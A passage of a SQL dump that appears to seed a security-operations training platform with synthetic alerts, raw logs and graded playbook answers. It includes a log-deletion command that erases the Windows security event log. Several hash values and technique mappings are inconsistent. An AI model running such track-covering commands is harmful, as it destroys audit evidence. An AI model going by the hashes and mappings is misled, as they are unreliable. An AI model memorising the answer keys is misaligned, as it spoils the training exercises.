Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (323, 'Data Exfiltration Attempt', 'high', 'Firewall Logs', 'APT10 attempts to exfiltrate the gathered data using encrypted channels to evade detection by security mechanisms, completing their operation.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:16Z\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"action\":\"allow\",\"bytes_sent\":10485760,\"username\":\"internal_user\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filenames\":[\"confidential_data.zip\"],\"firewall_rule\":\"Allow_HTTPS_Traffic\",\"geo_location\":\"External - United States\",\"alerts\":[\"Large data transfer detected\",\"Suspicious outbound connection\"]}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT10.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent malware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (324, 'Suspicious Network Traffic Detected', 'high', 'Firewall Logs', 'Unusual outbound traffic patterns detected from the enterprise firewall, possibly indicating unauthorized access attempts. The traffic originates from an internal IP and targets an external IP known for hosting malicious content. This activity suggests the initial access phase of an intrusion operation.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:30Z\",\"firewall_id\":\"FW123456\",\"src_ip\":\"10.0.5.23\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"src_port\":44321,\"dst_port\":8080,\"action\":\"allowed\",\"username\":\"jdoe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"suspicious_payload.exe\",\"bytes_out\":10240,\"bytes_in\":2048}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the suspected compromised account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash related to a suspicious file payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"suspicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File name indicative of malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (325, 'Malicious Firmware Update Detected', 'critical', 'Firewall Management Console', 'A rogue firmware update was installed on the firewall, allowing the attacker to execute code at a low level. Immediate action is required to mitigate potential threats.', 'Execution', 'T1496', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_type\":\"firmware_update\",\"source_ip\":\"185.143.223.91\",\"destination_ip\":\"192.168.1.1\",\"user\":\"admin\",\"firmware_version\":\"v5.3.2\",\"action\":\"update_executed\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"update_file\":\"firmware_update_v5.3.2.bin\",\"status\":\"completed\",\"message\":\"Firmware update executed successfully. No errors reported.\",\"suspicious_indicators\":{\"source_ip\":\"185.143.223.91\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.91\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous targeted attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal firewall device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to a known malicious firmware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"firmware_update_v5.3.2.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Repository\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (326, 'Persistence Mechanism Established', 'critical', 'Firmware Integrity Checks', 'The implant modifies the SPI flash memory, embedding itself to persist through reboots. This ensures the implant survives reboots and OS re-installations.', 'Persistence', 'T1105: Ingress Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:08Z\",\"event_id\":\"FW-INT-CHK-2023\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"detected_hash\":\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\",\"modified_firmware\":\"/dev/mtd0\",\"username\":\"admin\",\"alert_message\":\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\",\"severity\":\"Critical\",\"protocol\":\"SPI\",\"action_taken\":\"None\",\"firmware_version\":\"v1.4.3\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known firmware backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/dev/mtd0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Critical firmware storage location.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Authentication Logs\",\"verdict\":\"clean\",\"details\":\"Standard administrative account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (327, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'The attacker uses the compromised firewall to probe internal network components, seeking further access.', 'Lateral Movement', 'T1021', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.5\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":3389,\"action\":\"allowed\",\"username\":\"compromised_user\",\"filename\":\"malicious_payload.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_id\":\"1001\",\"message\":\"Suspicious lateral movement detected from compromised firewall to internal systems.\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a critical server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account showing unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File identified as malware by multiple antivirus engines.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"SHA256 Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NULL', 1, 0, NULL), (328, 'Command and Control Channel Established', 'high', 'Network Intrusion Detection System', 'Encrypted traffic is observed between the compromised firewall and an external server, indicating active C2 communication.', 'C2 Communication', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:07Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TLS\",\"session_id\":\"3f4e1ab7c9d4\",\"encrypted_bytes\":1520,\"decrypted_bytes\":0,\"tls_version\":\"TLS 1.2\",\"cipher_suite\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"host\":\"compromised-firewall.local\",\"username\":\"jdoe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_id\":\"C2-2023-0005\",\"malware_family\":\"APT29\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\"},{\"type\":\"username\",\"value\":\"jdoe\"}]}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 malware.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (329, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention System', 'Data packets containing sensitive information are detected being sent to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:37Z\",\"event_id\":\"EXF-20231015-002\",\"internal_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"filename\":\"confidential_report.pdf\",\"user\":\"jdoe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"action\":\"blocked\",\"description\":\"Attempted data exfiltration detected and blocked by DLP system.\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal inventory\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal inventory\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to suspicious activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (330, 'Privilege Escalation Detected', 'high', 'Access Logs', 'Unauthorized attempts to escalate privileges within the network were detected, indicating that the attacker is attempting to gain elevated access.', 'Privilege Escalation', 'T1068', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"username\":\"john_doe\",\"attempted_privilege\":\"Administrator\",\"previous_privilege\":\"Standard User\",\"process\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\",\"status\":\"Failed\",\"message\":\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in previous suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (331, 'Attempt to Cover Tracks Detected', 'high', 'Log Monitoring System', 'An advanced attack has been detected where log files are being tampered with, indicating an attempt to erase evidence of an attack.', 'Defense Evasion', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"4625\",\"system\":{\"hostname\":\"server01.internal.local\",\"ip_address\":\"192.168.1.15\"},\"user\":{\"username\":\"attacker_user\",\"user_id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\"},\"action\":\"Delete\",\"target_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"process\":{\"name\":\"cmd.exe\",\"id\":\"5604\",\"command_line\":\"cmd.exe /c del C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\"},\"network\":{\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"TCP\",\"port\":\"445\"},\"hash\":{\"algorithm\":\"SHA256\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple attack campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected for this hash.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Username associated with unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (332, 'Internal Reconnaissance Detected', 'high', 'SIEM Alerts', 'The attacker performs scans and probes to map out the network and identify further targets. Advanced techniques were used to evade detection during reconnaissance activities.', 'Reconnaissance', 'T1046: Network Service Scanning', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"rec-2023-00123\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"scanned_ports\":[22,80,443,445],\"protocol\":\"TCP\",\"detected_tool\":\"nmap\",\"username\":\"admin\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"network_scan\",\"outcome\":\"success\"}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with known scanning activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by scan.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with reconnaissance tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (333, 'Final Data Extraction Detected', 'critical', 'Data Exfiltration Monitoring', 'Large volumes of data are prepared for final exfiltration, marking the conclusion of the attack operation. Data transfer detected from internal network to an external IP linked with known malicious activity.', 'Exfiltration', 'T1020', 1, 'new', NULL, '{\"timestamp\":\"2023-10-03T14:45:00Z\",\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.99\",\"user\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\",\"protocol\":\"HTTPS\",\"action\":\"Data Transfer\",\"bytes_transferred\":104857600,\"indicator_of_compromise\":true}', '2026-01-02 20:29:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"suspicious\",\"details\":\"File hash found in recent suspicious activity reports.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"Filename matches naming pattern of sensitive data archives.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"suspicious\",\"details\":\"User account has been flagged for unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL), (334, 'Compromised Website Detected', 'high', 'Web Proxy Logs', 'APT32 has injected malicious JavaScript into the human rights organization\'s website, setting the stage for the delivery of a malicious payload to site visitors.', 'Initial Access', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:52Z\",\"client_ip\":\"192.168.1.105\",\"request_method\":\"GET\",\"host\":\"humanrights.org\",\"url\":\"/index.html\",\"referrer\":\"http://malicious-redirect.com/landing\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\",\"status_code\":200,\"response_size\":4521,\"malicious_js_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.45\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT32 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious JavaScript used by APT32\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-redirect.com/landing\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing campaigns and malware distribution\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (335, 'Obfuscated JavaScript Execution', 'high', 'Browser Security Logs', 'The obfuscated JavaScript payload is executed on visitor\'s browsers, preparing the system for malware deployment. This indicates the transition from web-based compromise to client-side infection.', 'Execution', 'T1059.007 - JavaScript', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:57Z\",\"event_id\":\"JS-Exec-20231015-143\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.15\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\"script_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"affected_user\":\"jdoe\",\"script_name\":\"obfuscated_payload.js\",\"referrer\":\"http://malicious-example.com/landing\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel DB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a known JavaScript exploit kit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"obfuscated_payload.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File name associated with obfuscated scripts used in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (336, 'Custom Backdoor Installation', 'high', 'Endpoint Detection and Response (EDR)', 'An attacker has successfully installed a custom backdoor on macOS systems. This persistence mechanism allows continuous access and control over the infected systems of users who visited the compromised site.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"persistence\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"file_path\":\"/Users/jdoe/Library/LaunchAgents/com.example.backdoor.plist\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"launchd\",\"process_id\":1234,\"sha256_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known macOS 